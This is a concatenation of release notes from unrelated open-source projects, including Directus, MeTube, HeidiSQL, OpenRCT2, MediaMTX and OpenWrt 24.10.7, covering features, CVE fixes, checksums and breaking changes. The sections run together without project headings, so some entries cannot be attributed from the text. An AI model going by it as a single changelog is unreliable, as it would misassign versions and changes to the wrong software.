• create-directus-extension@12.0.0
• create-directus-project@13.0.0
• @directus/env@6.0.0
• @directus/errors@2.4.0
• @directus/extensions@4.0.0
• @directus/extensions-registry@4.0.0
• @directus/extensions-sdk@18.0.0
• @directus/format-title@13.0.0
• @directus/memory@4.0.0
• @directus/pressure@4.0.0
• @directus/release-notes-generator@3.0.0
• @directus/schema@14.0.0
• @directus/schema-builder@1.0.0
• @directus/specs@14.0.0
• @directus/storage@13.0.0
• @directus/storage-driver-azure@13.0.0
• @directus/storage-driver-cloudinary@13.0.0
• @directus/storage-driver-gcs@13.0.0
• @directus/storage-driver-local@13.0.0
• @directus/storage-driver-s3@13.0.0
• @directus/storage-driver-supabase@4.0.0
• @directus/stores@3.0.0
• @directus/system-data@4.5.0
• @directus/themes@2.0.0
• @directus/types@16.0.0
• @directus/update-check@14.0.0
• @directus/utils@13.5.0
• @directus/validation@3.0.0
• @directus/visual-editing@2.1.0
• @directus/sdk@22.0.0

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.06.10

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.06.10

Changes

• upgrade yt-dlp from 2026.3.17 to 2026.6.9 (e30a24f)

12.18 - 2026-06-09

⛰️ Features

• (packaging) Create .rpm package through Makefile, plus let GH action run that step in release mode - (fc728cf)
• Create checkbox in advanced session setting for new ForceUnicode setting - (75a0f7f)
• Create opt-out setting "ForceUnicode", for sessions which shall not force Unicode communication - (ed9a94f)
• Enable connection port visible in a column of the session tree - (7cfdb97)
• Display auth plugin in a new column of the user listing tree - (3e4f562)
• Support authentication plugin selection in user manager - (07112a0)
• Grid export option for exporting the focused grid column only - (d896680)
• Bypass automatic foreign key lookup in data grid editing through new menu item - (a5ae04b)
• Add a separate menu item "copy formatted text", using the old code for copying SynEdit-highlighted text as HTML - (84c63c6)
• Filter edit box for shortcuts in preferences - (fb243fc)
• Create CLI app for adding PE security flags to heidisql.exe - (3e797e2)
• Rename snippet per right-click on query helpers tree - (7171e48)
• Name columns in SELECT when exporting table with invisible columns - (1799b0d)
• Support invisible indexes on MySQL 8.0+ and ignored indexes on MariaDB 10.6+ - (b3fa484)
• Support assigning a default role to a user - (96d2aef)
• Support assigning roles to a user or role - (96717cd)
• Do not require MySQL's RELOAD privilege just for opening the user manager - (f79d9a5)
• When nodes are filtered, change "Check all" action to "Change all visible" - (ebd60b3)
• Disable role rename, add menu item for creating a role, support role deletion - (83472c5)
• Prevent editing contents of generated columns in data grid - (9ecdff0)
• Basic support for MariaDB user roles, loaded without SQL error and shown with a different icon - (3249401)
• Add context menu item for deleting a single query from the history - (0035d5e)
• Reset a table's current auto_increment value in "delete + insert data" mode - (0422bb3)
• Support cancelling server login dialog - (e5b9574)
• Keep EXPLAIN output format traditional, on newer MySQL servers - (90f9937)
• Make HTML export dark/light mode aware - (dc046e9)
• Allow setting database to in PostgreSQL connections, and show and in the pulldown selector - (950e2ca)

🚀 Enhancements

• Disable plugin selector as long as no user was selected - (54dd7d8)
• Do not copy default type and value from previous column when adding columns to a table - (42a061d)
• Suppress dialog for saving modified SQL on app close, when tabs get auto-restored - (4ca01d9)
• Remove FLUSH PRIVILEGES from the user managers FormShow handler. If a click on a non-flushed user in the tree produces an exception, that is caught and shown as a normal error message. - (fe7a5ef)
• 50% black grid lines, should fit on both light and dark theme - (1872916)
• Increase supported table size and row limit for quick filter menu showing distinct values - (48eca57)

🐛 Bug Fixes

• (ui) Filter away vertical writing fonts with an @ prefix - (1814ee9)
• (ui) Size and margin of buttons on SQL help dialog - (61bc258)
• (ui) Apply the same larger tree node height on Linux - (c770406)
• (ui) Remove default "add user" event from add button, turn it into a pure dropdown button - (d7910c1)
• Copy table dialog crashes when none of dbtree and listtables has Focused=True - (9216061)
• Prefer SHOW KEYS over SHOW INDEXES, which are synonyms, while very old servers only accept the one with KEYS - (b97122c)
• Prevent grid queries from doing "WHERE intcol::text = 1", due to "1" being incompatible to the text value on the left - (bcea889)
• Vulnerability CVE-2025-70873, updating SQLite libs to v3.53.1 - (2930be8)
• Complaint about invalid password length on user plugins which have no fixed password length - (510b141)
• SUBSTRING() on array typed VARCHARs throw "function substr(...) does not exist" - (5f2959d)
• MS SQL throws "Cannot drop database xyz, because it is currently in use" when user is about to drop the current database - (fa2bb05)
• Wrong tab order after inserting new checkbox in the middle - (59d4f1f)
• Space missing in CREATE TABLE code of PG table with SERIAL column - (1633c33)
• Quick filter prompts on numbers break WHERE clause through local formatting - (e7646a0)
• Restore displayed session name in message dialog caption, was removed in commit:63028518f8b0d5869383d3bc0c42f188851797ed - (a6d6e70)
• Missing bottom anchor on shortcuts tree - (f8c4bde)
• Broken ci compilation for Windows - (570fab1)
• Broken ci compilation, move -WB -WR linker options to the conditionals section of the lpi file - (97ec20b)
• Turn exception in ParseViewStructure into a log message - (7562a1e)
• Data grid filter cut with several double-dash comments on one line - (dac7b0e)
• Hidden input box for line terminator in csv import dialog - (f20d634)
• Mouse click in edited row calls save action although focus did not change - (b8313e5)
• SSH command line tweaks, patch from jarczakpawel - (454571e)
• Broken compilation due encoding update to utf-8: ellipsis char constant seen as string now, instead of char - (26b9696)
• Replace hardcoded Windows directory separator with DirectorySeparator - (41615e6)
• Explicitly set client encoding on PG connection - (79c5e4c)
• MSSQL foreign key lookup to include table schema - (305534d)
• Wrong ENUM column type detection, due to less strict regex - (e731fd0)
• Do not start edit mode in ListTables on right mouse button click - (89ccbac)
• Staying on current table by click on "follow foreign key" when the foreign table lives in a different database - (8643172)
• Some crashes found in uploaded crash reports - (7bed735)
• Enable save button after changing default role per combobox - (508b139)
• Support backtick quoted user roles, and some other TValueListEditor related bug fixes - (86ea19c)
• A few compiler warnings - (c6dffe1)
• Pre-select nothing in BOOL grid cell editor on PostgreSQL - (1895959)
• Allow non existent SQLite files, only complain when its path does not exist - (02cf4cb)
• Solution for #2431 breaks other stuff, reverting a part of it - (e940863)
• Editing table data on mysql versions without generated column support - (32f3e6b)
• EAbort crash when copying text from SynEdit without a highlighter - (6c219b9)
• Missing anchors and autosize in user manager form - (91b90bc)
• Reset tree refresh marker earlier, so SetActiveDatabase triggers events and hides the table + data tab after dropping tables - (d2c9c96)
• Prevent crash due to unsupported edit-database feature on MS SQL - (68aeb96)
• Clear data grid before indicating a broken or temporary table for which we get no columns from IS.COLUMNS - (b4ec223)
• Populate SSH executable combo with only a global "ssh" command, do not add .exe files on Linux and macOS - (37f57ce)
• Call to non existent inherited constructor version of TSQLBatch - (b2f4d5b)
• TSQLBatch using backslash for escaping single quotes on all server types. Introduce server type specific TSQLBatch.FEscape char. - (e9af525)
• Crash in SQL export to database for zero length SQL, plus upgrade old-style string handling - (056b5e9)
• Do not delete selected SQL text from editor when trying to focus the position of erroneous SQL - (f5c5f33)
• Crash after canceling query - (ee16571)

🚜 Refactor

• Convert remaining latin1 unit to utf-8 - (85fb0bd)
• Sync from master - (9727d53)
• Revert most of what I did for #2424 - (3d547fd)
• Prefer qAutoInc in SQLProvider over dedicated AutoIncName method - (2fbb779)
• Simplify some more calls to Query() with the overloaded variants - (b0ab0fc)
• Convert more TFeatureOrRequirement's to TQueryId - (9f21853)

Localize

• Update compiled .mo translation files - (53f95d2)

Contributors

• @ansgarbecker

New Contributors ❤️

• @jonathanp12 made their first contribution

0.5.2 (2026-06-07)

• Improved: [#26322] [Plugin] Add footpath flags to FootpathSurfaceObject in the plugin API.
• Improved: [#26566] Improve the performance of sorting sprites.
• Fix: [#26350] [Plugin] ListViews altered by plugins post their creation are not invalidated.
• Fix: [#26565] Game crashes when switching to another tab in the guest window.
• Fix: [#26583] The default tab is not highlighted when opening a ride window.
• Fix: [#26602] Crash when locating the nearest mechanic for a ride that has not previously been inspected.
• Fix: [#26615] Missing junction path tile in Build your own Six Flags Over Texas.
• Fix: [#26616] Fix gap in buyable land in Build your own Six Flags Magic Mountain.
• Fix: [#26624] Tile elements selected by clicking on them with the tile inspector open do not always redraw correctly.
• Fix: [#26634] Add missing park patch file for Build your own Six Flags Great Adventure.

Release created in https://github.com/OpenRCT2/OpenRCT2/actions/runs/27089751091

SHA256 checksums:

08869f7e5f34b44920a4209a0d81b2fb688b8fabb16fd23d7d486536e2f9e482  ./OpenRCT2-v0.5.2-linux-x86_64.AppImage
162c61e65f4327d3d5406dcfebc0b634ba6a0c8b1d8a71fb12f7a14cebd3a158  ./OpenRCT2-v0.5.2-Linux-trixie-x86_64.tar.gz
73f114744a5f44c63225db7a3897158addc83094797e52069d000b007d63a508  ./OpenRCT2-v0.5.2-windows-installer-win32.exe
f433cffae1cee88f71de0bb4a296d3c63b4802f907e08078c019d10a475bf050  ./OpenRCT2-v0.5.2-windows-installer-x64.exe
54715dacc97370a38f83572d609135a9ef395324ae38fd6ae3864aa6de958d0d  ./OpenRCT2-v0.5.2-Linux-resolute-x86_64.tar.gz
34477e8339107d94ff441c99d00f6e94a26e481ab97727c4b744ab01b38d842a  ./OpenRCT2-v0.5.2-windows-symbols-x64.zip
2d8e436217a2351eeb016715652f205d8c1f21f7467b25e0f9895b8175a1040a  ./OpenRCT2-v0.5.2-windows-symbols-win32.zip
17561e865947ac69394fc21a978102b36b6a3681fd2e22bda45162f223a7d5f4  ./OpenRCT2-v0.5.2-windows-symbols-arm64.zip
3c0ab35a415907c883628a7113a20607041c00c2ef60419da0f2ebffcf0e5c8a  ./OpenRCT2-v0.5.2-windows-installer-arm64.exe
247230c20657d5ae55494a6a5fb80f3050ef573c6be880a782283cf587813585  ./OpenRCT2-v0.5.2-windows-portable-win32.zip
6bc105b4fa9c751e17ffa13af68a6070f8a0956b713d2602fcbf67d3380c945f  ./OpenRCT2-v0.5.2-sha256sums.txt
1e5bea5f11dcd44e803ecf6b51242ac33ae1ce3a5186ed07362c05fba7604892  ./OpenRCT2-v0.5.2-windows-portable-arm64.zip
b80fd9b439fb42d1c4d58245fb9215bbea89813326e3616b72e95181a8d06787  ./OpenRCT2-v0.5.2-macos-universal.zip
e5aea2add0bc140dc1a0b2bde6b02cbf569656ba4e0e4bf1402c99be6540b7d9  ./OpenRCT2-v0.5.2-windows-portable-x64.zip
262f57a8b1859e58b5319e3aee12062d215170868b9ded5d963c67d53dce6b5d  ./OpenRCT2-v0.5.2-Linux-noble-x86_64.tar.gz
1cbe1db375094d64af72df042f291bbc92386fb63970c8260bc3cd1547cd842d  ./OpenRCT2-v0.5.2-android.apk
8f13a7d3a624f2ff56dd55545c6e38691801cb159065e5c56b12eebc818a5a95  ./OpenRCT2-v0.5.2-Linux-bookworm-x86_64.tar.gz

[0.16.8] - 2026-06-06

If you are upgrading from v0.16.x, replace the binary (or run docker pull). If you are upgrading from v0.15.x and below, please read the upgrading documentation for more information on how to upgrade from previous versions.

Added

Changed

• OAuth: Rework access tokens to an AES-256-GCM-SIV AEAD format that carries the account name for proxy routing.
• Added more internal TLDs to the domain validation.

Fixed

• MTA:
  • Sub-addressing with external directories returns 550 Mailbox not found.
  • Disabled aliases continue receiving messages.
• JMAP for File Storage: FileNode/get returns a stale state string.
• Make SieveSystemInterpreter.defaultReturnPath and MtaQueueQuota.match optional expressions.
• Rate limiter panics when periods under 1 second are used.
• CalDAV/CardDAV: Calendar events, contacts, calendars and address books deleted via JMAP do not write a vanished tombstone.
• DNS updater: bump to dns-update-v0.5.1.

Check binary attestation here

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.06.06

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.06.06

Changes

• add option for following nightly yt-dlp releases (closes #999) (ee20512)

⚠️ Potential Breaking Changes

Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160)

• Health checks are cached by default and shared across multi-instance deployments

• /server/health will return 404 for unauthenticated requests, use /server/ping for liveness checks

• cache, rateLimiter and rateLimiterGlobal health checks have been replaced by a generic redis check using the redis: prefix

• @directus/api

  • Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160 by @ComfortablyCoding)

✨ New Features & Improvements

• @directus/api
  • Allow disabling the health check endpoint via HEALTHCHECK_ENABLED or selectively disabled checked services via HEALTHCHECK_SERVICES (#27160 by @ComfortablyCoding)
• @directus/types
  • Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160 by @ComfortablyCoding)
• @directus/env
  • Allow disabling the health check endpoint via HEALTHCHECK_ENABLED or selectively disabled checked services via HEALTHCHECK_SERVICES (#27160 by @ComfortablyCoding)
• @directus/memory
  • Added TTL support for local KV and cache stores (#27160 by @ComfortablyCoding)
• @directus/system-data
  • Updated directus_oauth_* system collection visibility to match other system collections (#27682 by @hanneskuettner)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Fixed project setup silently ignoring invalid license keys (#27671 by @ComfortablyCoding)
  • Fixed tick rendering when count exceeds display limit in v-slider (#27644 by @HZooly)
  • Consolidated URLs and emails into shared constants (#27641 by @HZooly)
  • Capped datepicker year to prevent invalid date (#27659 by @HZooly)
  • Fixed EXTENSIONS_PATH and EXTENSIONS_LOCATION env vars not being respected by the Vite dev server (#27642 by @HZooly)
  • Added notice on license page with oig link (#27661 by @robluton)
  • Fixed bug on tooltip value when decimals is 0 in pie chart panel (#27356 by @Prateet-Github)
  • Added missing collection note translations for the directus_oauth_* system collections (#27682 by @hanneskuettner)
  • Fixed search input not trimming whitespace, causing queries with leading or trailing spaces to return no results (#27359 by @khanahmad4527)
  • Added minor copy change to license onboarding and license key interface (#27651 by @robluton)
  • Updated license request links. (#27652 by @HZooly)
  • Added support for translatable flow names via the existing $t: prefix and translation strings, matching the field/collection label pattern. The flow name input in the flow editor now exposes the translation picker. (#27472 by @khanahmad4527)
  • Removed unsupported json filter function from the studio (#27669 by @sourav-18)
• @directus/api
  • Fixed nested deep query parameters being dropped when filters use dynamic variables (#27676 by @mazen-salah)
  • Fixed bulk creation of itemless drafts always fails (#27683 by @ComfortablyCoding)
  • Prevented setting a custom user provider when not entitled to SSO (#27675 by @ComfortablyCoding)
  • Fixed aliased relational fields in GraphQL queries, fragments and REST queries (#27054 by @AlexGaillard)
  • Fixed failed itemless drafts being dropped from version reads when limit=-1 (#27578 by @alvarosabu)
  • Fixed singletons allowing multiple itemless versions (#27532 by @formfcw)
  • Fixed issue causing duplicate admin roles on first admin creation (#27663 by @robluton)
  • Fixed project setup silently ignoring invalid license keys (#27671 by @ComfortablyCoding)
• @directus/sdk
  • Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160 by @ComfortablyCoding)
  • Fixed SingletonCollections incorrectly including core schema collections (#27196 by @kheiner)
• @directus/constants
  • Consolidated URLs and emails into shared constants (#27641 by @HZooly)

📦 Published Versions

• @directus/app@16.0.0-rc.1
• @directus/api@36.0.0-rc.1
• @directus/composables@11.5.0-rc.1
• @directus/constants@14.4.0-rc.1
• create-directus-extension@12.0.0-rc.1
• @directus/env@6.0.0-rc.1
• @directus/extensions@4.0.0-rc.1
• @directus/extensions-registry@4.0.0-rc.1
• @directus/extensions-sdk@18.0.0-rc.1
• @directus/memory@4.0.0-rc.1
• @directus/pressure@4.0.0-rc.1
• @directus/schema-builder@1.0.0-rc.1
• @directus/storage-driver-azure@13.0.0-rc.1
• @directus/storage-driver-cloudinary@13.0.0-rc.1
• @directus/storage-driver-gcs@13.0.0-rc.1
• @directus/storage-driver-s3@13.0.0-rc.1
• @directus/storage-driver-supabase@4.0.0-rc.1
• @directus/system-data@4.5.0-rc.1
• @directus/themes@2.0.0-rc.1
• @directus/types@16.0.0-rc.1
• @directus/utils@13.5.0-rc.1
• @directus/validation@3.0.0-rc.1
• @directus/sdk@22.0.0-rc.1

New major features

Media-over-QUIC

• support reading and publishing with Media-over-QUIC (#5815) Media-over-QUIC is a streaming protocol built upon cutting edge protocols (QUIC, HTTP3) and browser APIs (WebTransport, WebCodecs). It's slightly faster than WebRTC, has an advanced data recovery mechanism, it supports additional codecs (FLAC) and is less complicated to route. Check the documentation for instructions and details.

RTMP

• support reading and writing FLAC (#5778) (#5789)

HLS

• support reading and publishing FLAC (#5778) (#5791)

Fixes and improvements

General

• Add user agent field to RTMP, RTSP, WebRTC, and HLS (#5753)
• add --check-version command line flag (#5786) this allows to check whether a new version is available without upgrading.
• use file name suffix for OS-specific code wherever possible (#5787)
• fix two hot reloading cases (#5817) * reload SRT server when metrics server is reloaded * reload API server when RTMPS server is reloaded

RTSP

• client: trigger TCP timeout only if nothing is received (bluenviron/gortsplib#1002) (bluenviron/gortsplib#968) (bluenviron/gortsplib#1067) Previously, a data packet was required, now a keepalive response from the server is enough.
• sdp: support non-standard 'meta' media type (bluenviron/gortsplib#1068)
• forbid H264 packetization mode zero (bluenviron/gortsplib#1072) Packetization mode zero requires allowing inefficient and brittle fragmented UDP packets, which we are not.

RTMP

• client: add FLAC fourCC (bluenviron/gortmplib#73)
• do not exit in case of undocumented Flash control messages (#5512) (bluenviron/gortmplib#75)

HLS

• remove redundant JavaScript argument (#5806)
• muxer: fix race condition when generating playlist (bluenviron/gohlslib#359) (bluenviron/gohlslib#360) Max age of playlist depends on segments, so it needs to be covered by the segment mutex.
• muxer: use coherent version in all playlists (#5781) (bluenviron/gohlslib#363)

WebRTC

• make JavaScript internal variables private (#5804)
• fix connectivity after network changes (#5097) (#5818)

RPI Camera

• use timestamp of frame in text overlay (#2733) (bluenviron/mediamtx-rpicamera#103)

Dependencies

• code.cloudfoundry.org/bytefmt updated from v0.72.0 to v0.74.0
• github.com/abema/go-mp4 updated from v1.5.0 to v1.6.0
• github.com/bluenviron/gohlslib/v2 updated from v2.3.2 to v2.4.0
• github.com/bluenviron/gortmplib updated from v0.3.2 to v0.4.0
• github.com/bluenviron/gortsplib/v5 updated from v5.5.3 to v5.5.4
• github.com/bluenviron/mediacommon/v2 updated from v2.8.3 to v2.9.0
• github.com/go-git/go-git/v5 updated from v5.19.0 to v5.19.1
• github.com/matthewhartstonge/argon2 updated from v1.5.3 to v1.5.4
• github.com/pion/ice/v4 updated from v4.2.5 to v4.2.7
• github.com/pion/transport/v4 updated from v4.0.1 to v4.0.2
• github.com/pion/webrtc/v4 updated from v4.2.12 to v4.2.14
• golang.org/x/crypto updated from v0.51.0 to v0.52.0
• golang.org/x/net updated from v0.54.0 to v0.55.0
• golang.org/x/sys updated from v0.44.0 to v0.45.0
• github.com/pion/dtls/v3 updated from v3.1.2 to v3.1.3
• github.com/pion/sctp updated from v1.9.5 to v1.10.0
• github.com/pion/srtp/v3 updated from v3.0.10 to v3.0.11
• github.com/pion/stun/v3 updated from v3.1.2 to v3.1.4
• github.com/pion/turn/v5 updated from v5.0.3 to v5.0.7
• github.com/quic-go/webtransport-go v0.10.0 added
• golang.org/x/sync v0.20.0 added
• github.com/dunglas/httpsfv v1.1.0 added
• github.com/bluenviron/mediamtx-rpicamera updated from v2.5.7 to v2.6.0

Security

Binaries are compiled from source code by the Release workflow, which is a fully-visible process that prevents any change or external interference in produced artifacts.

Checksums of binaries are also published in a public blockchain by using GitHub Attestations, and they can be verified by running:

ls mediamtx_* | xargs -L1 gh attestation verify --repo bluenviron/mediamtx

You can verify checksums of binaries by downloading checksums.sha256 and running:

cat checksums.sha256 | grep "$(ls mediamtx_*)" | sha256sum --check

Changelog

Features

• 66ba9d9: feat: Add language pt-BR (Portuguese Brazilian) (#1743) (@antraxbr666)

Others

• 24bdf67: update deps (@seriousm4x)

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.05.30

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.05.30

Changes

• styling improvements (897d52c)

Hi,

The OpenWrt community is proud to announce the newest stable release of the OpenWrt 24.10 stable series.

This release fixes several security issues, including security fixes in dnsmasq and the Linux kernel. We recommend everyone to upgrade.

The OpenWrt 24.10 series is in security maintenance (only security problems are fixed), with end of life (EoL) projected for September 2026. We recommend migrating to OpenWrt 25.12 before then.

Download firmware images using the OpenWrt Firmware Selector:

• https://firmware-selector.openwrt.org/?version=24.10.7

Download firmware images directly from our download servers:

• https://downloads.openwrt.org/releases/24.10.7/targets/

Main changes between OpenWrt 24.10.6 and OpenWrt 24.10.7

Only the main changes are listed below. See changelog-24.10.7 for the full changelog.

Security fixes

Linux kernel:

• CVE-2026-43284 ("Dirty Frag"): local privilege escalation through the IPsec ESP code path. This only affects devices that use IPsec, i.e. that have kmod-ipsec / the esp4 or esp6 kernel modules loaded. Fixed by the Linux kernel update to 6.6.138.
• CVE-2026-31431 ("Copy Fail"): in earlier releases this only affected users of the starfive target and users who had installed kmod-crypto-user. Fixed by the Linux kernel update to 6.6.137.

dnsmasq:

• Multiple upstream security fixes backported to dnsmasq 2.90: CVE-2026-2291, CVE-2026-4890, CVE-2026-4891, CVE-2026-4892, CVE-2026-4893 and CVE-2026-5172.

TLS/crypto libraries:

• openssl: update to 3.0.20, fixing multiple security vulnerabilities
• mbedtls: update to 3.6.6, fixing multiple security vulnerabilities
• wolfssl: update to 5.9.1, fixing multiple security vulnerabilities

Device support

• airoha: an7581: enable USB support
• airoha: EN7581: fix PCIe initialization and add x2 lane (x2 link) support
• airoha: add U-Boot support for EN7581/AN7583 boards
• bcm53xx: align image names with the device-tree compatible (affects image selection in the Firmware Selector)
• qualcommax: ipq807x: Linksys MX5300: fix MAC address labelling
• ramips: mt7621: Xiaomi Mi Router AC2100: fix MAC address labelling

Various fixes and improvements

• airoha: an7581: fix kernel panic in the I2S audio driver
• airoha: fix Ethernet hardware offload on EN7581 (backported upstream airoha_eth patches, offload with GDM2 present)
• lantiq: fix refcount and memory leak in the MTD partition parser
• wifi-scripts: fix MAC address check in the mac80211 setup script

Core components update

• Linux kernel: update from 6.6.127 to 6.6.141
• ca-certificates: update from 20250419 to 20260223
• mbedtls: update from 3.6.5 to 3.6.6
• openssl: update from 3.0.19 to 3.0.20
• wireless-regdb: update from 2026.02.04 to 2026.03.18
• wolfssl: update from 5.7.6 to 5.9.1

Upgrading to 24.10

Sysupgrade can be used to upgrade a device from 23.05 to 24.10, and configuration will be preserved in most cases.

For for upgrades inside the OpenWrt 24.10 stable series for example from a OpenWrt 24.10 release candidate Attended Sysupgrade is supported in addition which allows preserving the installed packages too.

• Sysupgrade from 22.03 to 24.10 is not officially supported.

• There is no configuration migration path for users of the ipq806x target for Qualcomm Atheros IPQ806X SoCs because it switched to DSA. You have to upgrade without saving the configuration.
  ''Image version mismatch. image 1.1 device 1.0 Please wipe config during upgrade (force required) or reinstall. Config cannot be migrated from swconfig to DSA Image check failed''

• User of the Linksys E8450 aka. Belkin RT3200 running OpenWrt 23.05 or earlier will need to run installer version v1.1.3 or later in order to reorganize the UBI layout for the 24.10 release. A detailed description is in the OpenWrt wiki. Updating without using the installer will break the device. Sysupgrade will show a warning before doing an incompatible upgrade.

• Users of the Xiaomi AX3200 aka. Redmi AX6S running OpenWrt 23.05 or earlier have to follow a special upgrade procedure described in the wiki. This will increase the flash memory available for OpenWrt. Updating without following the guide in the wiki break the device. Sysupgrade will show a warning before doing an incompatible upgrade.

• Users of Zyxel GS1900 series switches running OpenWrt 23.05 or earlier have to perform a new factory install with the initramfs image due to a changed partition layout. Sysupgrade will show a warning before doing an incompatible upgrade and is not possible. After upgrading, the config file /etc/config/system should not be restored from a backup, as this will overwrite the new compat_version value.

Known issues

• LEDs for Airoha AN8855 are not yet supported. Devices like the Xiaomi AX3000T with an Airoha switch will have their switch LEDs powered off. This issue will be addressed in an upcoming OpenWrt SNAPSHOT and the OpenWrt 24.10 minor release.
• 5GHz WiFi is non-functional on certain devices with ath10k chipsets. Affected models include the Phicomm K2T, TP-Link Archer C60 v3 and possibly others. For details, see issue #14541.

Full release notes and upgrade instructions are available at
https://openwrt.org/releases/24.10/notes-24.10.7

In particular, make sure to read the regressions and known issues before upgrading:
https://openwrt.org/releases/24.10/notes-24.10.7#known_issues

For a detailed list of all changes since 24.10.6, refer to
https://openwrt.org/releases/24.10/changelog-24.10.7

To download the 24.10.7 images, navigate to:
https://downloads.openwrt.org/releases/24.10.7/targets/
Use OpenWrt Firmware Selector to download:
https://firmware-selector.openwrt.org?version=24.10.7

As always, a big thank you goes to all our active package maintainers, testers, documenters and supporters.

Have fun!

The OpenWrt Community

To stay informed of new OpenWrt releases and security advisories, there
are new channels available:

• a low-volume mailing list for important announcements:
  https://lists.openwrt.org/mailman/listinfo/openwrt-announce

• a dedicated "announcements" section in the forum:
  https://forum.openwrt.org/c/announcements/14

• other announcement channels (such as RSS feeds) might be added in the
  future, they will be listed at https://openwrt.org/contact

⚠️ Potential Breaking Changes

Introduced VERSION_KEY_ constants and renamed main to published @alvarosabu (#27397)*
Backward Compatibility: You can now use ?version=published to resolve versions of the main item(s) via the version query parameter. For backward compatibility, ?version=main will continue to work.

Replaced status field with archived boolean in collection settings @alvarosabu (#27397)
Backward Compatibility: Existing collections with string-based status fields continue to work unchanged; newly created collections now default to a boolean "Archived" field instead of the string "Status" field

Deprecated the VResizeable component @formfcw (#27437)

• Deprecation for extensions: The globally registered VResizeable component has been deprecated. Extension authors using <v-resizeable> should migrate to @directus/vue-split-panel or their own implementation.

Updated type system, borders, and theme variables @formfcw (#27437)

• Potential breaking change for theme extensions: headerShadow and sidebarShadow removed from LayoutConfig interface
• Potential breaking change for theme extensions: boxShadow removed from header theme rules schema
• Potential breaking change for theme extensions: sidebarShadow no longer exposed in layout wrapper state

Updated module navigation bar spacing and styling @HZooly (#27437)

• Potential breaking change in theme extensions: Removed navigation.project.borderColor / navigation.project.borderWidth / navigation.project.background from theming. No action is required — these props will simply no longer have any effect.

Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397)

• Breaking change — new behavior for versioned collections Published items in versioned collections are now locked. Edits must be made through the draft version.

Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437)

• Potential breaking change for extensions: The rounded prop has been removed from v-button. Extensions using rounded will still render correctly but buttons will appear as rounded rectangles instead of circles. No functional impact.

Changed license to MSCL-1.0-GPL (#27417)

• Breaking Change: Relicensed from BUSL-1.1 to MSCL-1.0-GPL (Monospace Sustainable Core License, Version 1.0).

Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437)

• Potential breaking change for theme extensions: The theme properties navigation.background, navigation.backgroundAccent, navigation.borderWidth, navigation.borderColor, header.background, header.borderWidth, and header.borderColor have been removed and replaced by shell.background, shell.backgroundAccent, shell.borderWidth, and shell.borderColor.
• Potential breaking change for theme extensions: Custom themes overriding any of these removed properties must migrate to the new shell scope. The corresponding CSS variables change from --theme--navigation--background, --theme--navigation--background-accent, --theme--navigation--border-*, --theme--header--background, and --theme--header--border-* to --theme--shell--background, --theme--shell--background-accent, and --theme--shell--border-*.

Removed the extra confirmation step from the publish flow @alvarosabu (#27487)

• Breaking change — new publish flow: Publishing a version no longer shows an additional confirmation dialog after confirming changes in the comparison modal. The item is published directly once the changes are confirmed.

Updated sidebar styles @formfcw (#27437)

• Potential breaking change for theme extensions: Removed section.toggle.borderWidth / section.toggle.borderColor in favor of section-level border tokens. No action is required — these props will simply no longer have any effect.
• Potential breaking change for theme extensions: Removed sidebarShadow and headerShadow from defineLayout(). No action is required — these props will simply no longer have any effect.

Refactored focus ring from border/box-shadow to outline @formfcw (#27437)

• Potential breaking change for theme extensions: borderColorFocus, boxShadowHover, and boxShadowFocus are removed from the theme schema — custom themes referencing these will lose their focus overrides silently
• Potential breaking change for interface extensions that relied on --theme--form--field--input--border-color-focus or --theme--form--field--input--box-shadow-focus CSS variables will need to migrate to --theme--form--field--input--focus-ring-color

Updated header bar elements and deprecated the headline slot @formfcw (#27437)

• Deprecation for extensions: The headline slot on the private view header bar has been deprecated. Existing content keeps rendering, but consumers using <template #headline> will now see a deprecation hint from Volar.

Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607)
The IP_TRUST_PROXY default was changed from true to false. If you run Directus behind a reverse proxy and rely on X-Forwarded-For (or similar) headers for client IP resolution, you must now explicitly set IP_TRUST_PROXY to true or a more specific trust configuration.

• @directus/app
  • Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397 by @formfcw)
  • Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437 by @formfcw)
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
  • Removed the extra confirmation step from the publish flow @alvarosabu (#27487 by @alvarosabu)
• @directus/api
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
• @directus/themes

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

• @directus/types

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

